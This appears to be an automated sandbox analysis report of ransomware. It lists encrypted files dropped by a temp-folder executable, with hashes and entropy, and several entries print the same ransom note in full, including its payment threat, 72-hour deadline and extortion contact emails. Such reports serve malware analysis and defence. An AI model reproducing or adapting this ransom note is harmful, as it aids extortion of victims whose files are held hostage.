                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.842012599421523
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:xR3DB/G/xc9Tg0GQ+0YEL+wqbR17KfQrWRMoGhGi5NgXx2d40MluZt2uYyNzYU7B:RG/xiTg0G7qdpdlV4aXxhwt7YD08C
                                                                                                                                            MD5:4C424901C6758B05BC4C6958D1534066
                                                                                                                                            SHA1:C881A5309EB4D0491101F17D0F25C8677DEAF6AE
                                                                                                                                            SHA-256:5541D090627CEBB91CB346FECC5CBBE20F57EEB7DC7A59959FE42A947E5070E2
                                                                                                                                            SHA-512:6134F93E0EAE27BD3C807801EB2DB60C26B573DC96ECD6AAE41D2BD60A0838E0092B760420C5817BE410F0CB278D8FCD33F498FEB9591DD8D4AA892E96AE2537
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:F'.<~p.........x..M.'.L...[.2k.9O+/|..fc.fv.+.o3......~,.\]5.;W9.s...89.?.....j....@F..d4...'.*.......P6..H....7.a..6..Y ..'..S".Q6f..y..#%{..(....F^..=..g#P5;....V?*mGb..'..U./m........ffW...w..$..x.1....@.p...........3./....!...)P.).(..:.j.OG]+*....[..{.,.5.Ym.....f.8%.gz.k.p1.P.q...U.J.Y.a:..i'....(....U..38..$....${*#...e........G.Wd...T......m.d1d.IC...W.`alK.X.R.$.z.#....0.1...LA.4.X.P..E~....Va..].v.Sz./..........Z.3.....^(..:3b....Co.x)...&..V.&.C....&..Z+.....}TnC.y...._.O.I.f17....Gvi;7N.l..a;..q9...Q.z..f.I(F2..>`....{......1~..J(/.$..)3F..}w...,..D%..V.E.....s....\.kZO....q..Q......O..z.+..'_Z...,...w..%.`O'..........(..J.f..S....)T[Jl.....(v...^.VG...z...|..f..B....io1..`um...;.'.....e.h9..sI......E.a.".y.`.:...i..IoJ....pNB..Z..cV..Gr....=.\.....Uu$.....][.....<........r.c.H.1.8.4.h.|p....4.v....b.t..h.>....`..tFr..YtQf.....@.y].=[.;=.qS.@...O....79a,.E...Dd:........P...vXz.,..~...;.vb.".....m..-.;......0e?$ ..j.av.........$..JKPN.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.842012599421523
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:xR3DB/G/xc9Tg0GQ+0YEL+wqbR17KfQrWRMoGhGi5NgXx2d40MluZt2uYyNzYU7B:RG/xiTg0G7qdpdlV4aXxhwt7YD08C
                                                                                                                                            MD5:4C424901C6758B05BC4C6958D1534066
                                                                                                                                            SHA1:C881A5309EB4D0491101F17D0F25C8677DEAF6AE
                                                                                                                                            SHA-256:5541D090627CEBB91CB346FECC5CBBE20F57EEB7DC7A59959FE42A947E5070E2
                                                                                                                                            SHA-512:6134F93E0EAE27BD3C807801EB2DB60C26B573DC96ECD6AAE41D2BD60A0838E0092B760420C5817BE410F0CB278D8FCD33F498FEB9591DD8D4AA892E96AE2537
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:F'.<~p.........x..M.'.L...[.2k.9O+/|..fc.fv.+.o3......~,.\]5.;W9.s...89.?.....j....@F..d4...'.*.......P6..H....7.a..6..Y ..'..S".Q6f..y..#%{..(....F^..=..g#P5;....V?*mGb..'..U./m........ffW...w..$..x.1....@.p...........3./....!...)P.).(..:.j.OG]+*....[..{.,.5.Ym.....f.8%.gz.k.p1.P.q...U.J.Y.a:..i'....(....U..38..$....${*#...e........G.Wd...T......m.d1d.IC...W.`alK.X.R.$.z.#....0.1...LA.4.X.P..E~....Va..].v.Sz./..........Z.3.....^(..:3b....Co.x)...&..V.&.C....&..Z+.....}TnC.y...._.O.I.f17....Gvi;7N.l..a;..q9...Q.z..f.I(F2..>`....{......1~..J(/.$..)3F..}w...,..D%..V.E.....s....\.kZO....q..Q......O..z.+..'_Z...,...w..%.`O'..........(..J.f..S....)T[Jl.....(v...^.VG...z...|..f..B....io1..`um...;.'.....e.h9..sI......E.a.".y.`.:...i..IoJ....pNB..Z..cV..Gr....=.\.....Uu$.....][.....<........r.c.H.1.8.4.h.|p....4.v....b.t..h.>....`..tFr..YtQf.....@.y].=[.;=.qS.@...O....79a,.E...Dd:........P...vXz.,..~...;.vb.".....m..-.;......0e?$ ..j.av.........$..JKPN.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1315
                                                                                                                                            Entropy (8bit):7.859594717931576
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:kx32C0uCZQt+0taDxWj4Zd6CGskYc3QrOMB7VQo2VTCYiU:M2C0ypaDQcZdYN3UVTsiU
                                                                                                                                            MD5:D67A88CABC9B02950ED1E6BC40FCD257
                                                                                                                                            SHA1:0E3D3E9D28C5812DEA2D4B8AE2C5D82C480802B3
                                                                                                                                            SHA-256:38256FC6532011C446E7D2A54689419DA6DDE177544BCAFE311D3356B025CA2C
                                                                                                                                            SHA-512:554E0B634E803D87833819F55123B610F386A19CC8BD95DC572F23B5B436D21939BF231D7EBC3191DC8C79BCD4F18EF3A781890EBF98A90A83A1BE24D226F7BE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.r.+n..w.L;Hok...Ul.x.U...(....1..KzU.+.;..I...y.cA@.b.~..R?`....-;..a...|sZ.n...N-[.^=V.|.......... ...5.J.5f?n/.....5....o.g.MJ.V.....S\....f.nc...7.tq.U..v#..mF.>.j.x...M.!,.rrm7~.u+.....(0u..}.6a.7Z.J9c........"..n....J..K..Fl..]..X..K.#.../.n..1].4.....n.6.S...4....tm.&IB.;..[.>.c`.9.?>.;..~&J`h9k..l..h=..`S2E!.&.Xa.....C........X.b.,...@Vo&.eA.!..h...$s..vd....u.;..%.9..l.s.;.[.Hd.{.x.....3C.TU.<.<. ..9"..DH.(..=..............8...C.D.....=..... .w...B............6.x.8..n..r...$yl.e..8.....vv~..6+.[.v.;.]g.$.....g....r.. #........<.`y.V/y..B.!.........xz..y,....U..Px.N..R..q..jz.BV.z..$BM......_J......+..;....R./e'.....x.N.=...M........R....B.P.~.9.V4.yi.1.Kf.n..d.W5.......+...:...X.....Buv..z@...g2<F{.)/ e......>.GS_.%.%....-..T..qf..O...hA....qD.^.}'..$.....'8..F1....'C...6.2..Jn.J@>.PW2.Y.i<Q@..M..4e...C..l.c..q..bI........<..T...o.6_.....,.].............V../...F....i...o5.....i@.........4...:..W.O..%..w+s.%...L...P..:.....X
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1315
                                                                                                                                            Entropy (8bit):7.859594717931576
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:kx32C0uCZQt+0taDxWj4Zd6CGskYc3QrOMB7VQo2VTCYiU:M2C0ypaDQcZdYN3UVTsiU
                                                                                                                                            MD5:D67A88CABC9B02950ED1E6BC40FCD257
                                                                                                                                            SHA1:0E3D3E9D28C5812DEA2D4B8AE2C5D82C480802B3
                                                                                                                                            SHA-256:38256FC6532011C446E7D2A54689419DA6DDE177544BCAFE311D3356B025CA2C
                                                                                                                                            SHA-512:554E0B634E803D87833819F55123B610F386A19CC8BD95DC572F23B5B436D21939BF231D7EBC3191DC8C79BCD4F18EF3A781890EBF98A90A83A1BE24D226F7BE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.r.+n..w.L;Hok...Ul.x.U...(....1..KzU.+.;..I...y.cA@.b.~..R?`....-;..a...|sZ.n...N-[.^=V.|.......... ...5.J.5f?n/.....5....o.g.MJ.V.....S\....f.nc...7.tq.U..v#..mF.>.j.x...M.!,.rrm7~.u+.....(0u..}.6a.7Z.J9c........"..n....J..K..Fl..]..X..K.#.../.n..1].4.....n.6.S...4....tm.&IB.;..[.>.c`.9.?>.;..~&J`h9k..l..h=..`S2E!.&.Xa.....C........X.b.,...@Vo&.eA.!..h...$s..vd....u.;..%.9..l.s.;.[.Hd.{.x.....3C.TU.<.<. ..9"..DH.(..=..............8...C.D.....=..... .w...B............6.x.8..n..r...$yl.e..8.....vv~..6+.[.v.;.]g.$.....g....r.. #........<.`y.V/y..B.!.........xz..y,....U..Px.N..R..q..jz.BV.z..$BM......_J......+..;....R./e'.....x.N.=...M........R....B.P.~.9.V4.yi.1.Kf.n..d.W5.......+...:...X.....Buv..z@...g2<F{.)/ e......>.GS_.%.%....-..T..qf..O...hA....qD.^.}'..$.....'8..F1....'C...6.2..Jn.J@>.PW2.Y.i<Q@..M..4e...C..l.c..q..bI........<..T...o.6_.....,.].............V../...F....i...o5.....i@.........4...:..W.O..%..w+s.%...L...P..:.....X
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.261407606677051
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:MZkHEe194beP2ttoQ8583PIrh4pYvdb6Kd7g4T292n:MZSzZT8g9+kdb6KeAn
                                                                                                                                            MD5:5C3AA5239BF9DFA0AB86A37CB81B6A0D
                                                                                                                                            SHA1:C91E3179FE3A6276A847308410D4F99529F1D72F
                                                                                                                                            SHA-256:27CD66A5102B07415EA2C1ED58B23CC12C4655C5738EBA3CDE110AF325C0F2DA
                                                                                                                                            SHA-512:EFD694A76F4427EA65DDDC85FEAB2951094A5F511B3B1EF308F5497045558A989DB7B18D22F2F84C3C7BF8ED962078F3E44F3A6DBE22914F6BB74FA4936EA371
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...f..@..<v...............S..i.3~..|.@......E..&.T.m..8..2/.....].....W.....H......p[.9.....C.......Z...mi^"W.....ia..V.du.....R.....t..O......Z....DF.8......y.u.?.....0..\<d'zmqRZ._.NU..Xw..Y..Y.#.r6.^=*k\<.......>.X.l$.....~.....j..Y.3....IN.....(h....DG.....,52....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.228155873990246
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:0z6l/3FAeSil3lQ8Uj8ULfEzJWMawejpisjddHhO62F5Qcn:tfzUj8vcMBeVisHBOpNn
                                                                                                                                            MD5:3AEA0EDEEEA1BADA0969EC69A7433E77
                                                                                                                                            SHA1:537159F7F942707041C5356C4A854B4BBA5A2CDB
                                                                                                                                            SHA-256:758D8E9E22A867B0E60F5C7DC67F29F39C68F1D4C949D2F0B0DEC86628941A8F
                                                                                                                                            SHA-512:A4A865A947B6E764021913C847770426511C336F87998551167197BF98E9B10D3554663747FA048AE55C6BE7659E8897DCDF64F00B9A5B26A83D3F326A89FC3F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:i;.,..[...$.............k..+....e...#*..Zxc.`..jt...W...~y.i.......$.&.mI..F.4."......^........>.H.........^.;.y......uk....zV..f.....w.ym...X.L.(.8.'.Y....9...,.yr1-..q.(?.....A ..0f3..$.Yw..|.l&....aEbv.%....]Z.?..C.!<..LH.K@...E.AQC~.........Yf..kpJ..1......O0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.103347287241705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:/AlZpiaQPGUDco29o1lDbqd9MPrHnDLi7vpMaDShYkYbWuHn:/AlZpiBnBSgy9krHXiMa0YkYbbHn
                                                                                                                                            MD5:931CAD25DD57848B6AAFCF4CF4548131
                                                                                                                                            SHA1:5BA05B9779992D102ACB146E96567382164A744C
                                                                                                                                            SHA-256:D8C729F75C2BC83407DE429AE2B37537B3EB1221E7C110CC6F07DFC88F8F92DE
                                                                                                                                            SHA-512:38D8EA8C53349B2F0B0E7C448B02CB404B1D3A80332A6B2AC492170D6E85C45FD2DD9C799F3461B54073CA0DE89942F41A14FD76FE0809B80E60868F250834D5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..S.if...]J.C6............l..\..U]...e..J.HiR..mXI.9.....*...?5...eO.>..#v../....N...byQ...:........Nb/......>......3.....[../.c.w....'..A..__...a.1.6.D".1H..|..a|.M.~..^7..JE....J.q.......l....*...[.>..'n3..5.._LT$...^U.M.$..Bg#..u..9.yKZ.I....p..Q......]..5.kSv....@K0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.215452086508925
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:TnTlqVLBVZaIMplIm4lI7NGuu2bC+OMJUAmQ9ie360I2n:NqhsOCJUAmEJ360pn
                                                                                                                                            MD5:BD44B9EA79D840CB99EBBBB114F085BB
                                                                                                                                            SHA1:0D564EB168F5499DFC48CDEE6DB0E98FFE469F78
                                                                                                                                            SHA-256:7C78F3C1FCFA10FEA1A7B7AC1335745078463CE045670188BC20DB72EF985765
                                                                                                                                            SHA-512:91003D4F8B96152C3406DE78201B4727F40FEF0F78EE7FE56FF9D9129AC2F44EB2599EEAC49E7166F459383D8F15928EB4374F3D47AE6708FBFE858D58E754FE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:U...d?.j.n.#.U.............zp....&..6S.J.!..u.6h.....t@...q..6=......KL.op.....9G..o ............\.}._....y.6G.O].....+.....,.<..Y.......0.4,.Q...#..K..c.f#..Z...2........^&.D|."....lu.{...g.-.IW...+Z......K.m.n.4(^.g....W1.%6..3..a..q8.2E..CK.,.L..q..2Z+.M.8k..:.....W0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 05:52:26 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2673
                                                                                                                                            Entropy (8bit):3.980741445370966
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:8RdBTcwHNidAKZdA1P4ehwiZUklqeh0y+3:8FomOry
                                                                                                                                            MD5:8E788DE0A2291FD1B4045D5A85D749A0
                                                                                                                                            SHA1:BE5C19CBD51D0FCCE5D26565BEBE0757E9C6054C
                                                                                                                                            SHA-256:0F1574D9E105593DD9DDC09CC60608990829EAF103C82812B2DC0AA6BF8DA233
                                                                                                                                            SHA-512:630C31E8B22850446A0885C480EACEF3DAB9A50D3301022E563E08EAA6E149BA4BDD0D37CEC14BE969172A1DAD20EDCD9FD51FFA6231AA576FBAF012027409C0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L..................F.@.. ...$+.,........Q....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y.6....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.6....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y.6....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y.6.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y.6...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............}.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 05:52:26 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2675
                                                                                                                                            Entropy (8bit):3.998701471236037
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:8DdBTcwHNidAKZdA1+4eh/iZUkAQkqehby+2:83oHF9QKy
                                                                                                                                            MD5:799570B2A122C6E731491F2EC224EE7A
                                                                                                                                            SHA1:23167649DCC6358D922F7C00EE649FE931060900
                                                                                                                                            SHA-256:6E9305AE464B08A75896E38431B9CD221397138B5480D2E848F8B9BF03D7F83A
                                                                                                                                            SHA-512:CBEA0C54F7996C2729945ABA489D093B5D7D922A29B5E777706D5DA09A8CABCF89713030A782028D5F714F7E22F63B68506FFDADEC6357A6C4B89AAD21E0E832
                                                                                                                                            Malicious:false
